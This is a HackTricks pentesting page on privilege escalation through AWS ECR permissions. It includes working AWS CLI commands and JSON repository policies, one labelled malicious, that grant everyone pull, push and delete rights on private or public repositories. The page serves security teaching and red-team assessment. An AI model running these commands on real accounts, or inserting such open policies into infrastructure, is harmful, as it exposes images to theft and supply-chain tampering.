Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
An attacker with the ecr:GetAuthorizationToken
and ecr:BatchGetImage
can login to ECR and download images.
For more info on how to download images:
{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} aws-ecr-post-exploitation.md {% endcontent-ref %}
Potential Impact: Indirect privesc by intercepting sensitive information in the traffic.
ecr:GetAuthorizationToken
, ecr:BatchCheckLayerAvailability
, ecr:CompleteLayerUpload
, ecr:InitiateLayerUpload
, ecr:PutImage
, ecr:UploadLayerPart
An attacker with the all those permissions can login to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.
To learn how to upload a new image/update one, check:
{% content-ref url="../aws-services/aws-eks-enum.md" %} aws-eks-enum.md {% endcontent-ref %}
ecr-public:GetAuthorizationToken
, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload
, ecr-public:InitiateLayerUpload, ecr-public:PutImage
, ecr-public:UploadLayerPart
Like the previous section, but for public repositories.
An attacker with this permission could change the repository policy to grant himself (or even everyone) read/write access.
For example, in this example read access is given to everyone.
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Contents of my-policy.json
:
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}
Like the previoous section, but for public repositories.
An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
{% code overflow="wrap" %}
bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json
# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
{% endcode %}
Potential Impact: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
An attacker with this permission could change the registry policy to grant himself, his account (or even everyone) read/write access.
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.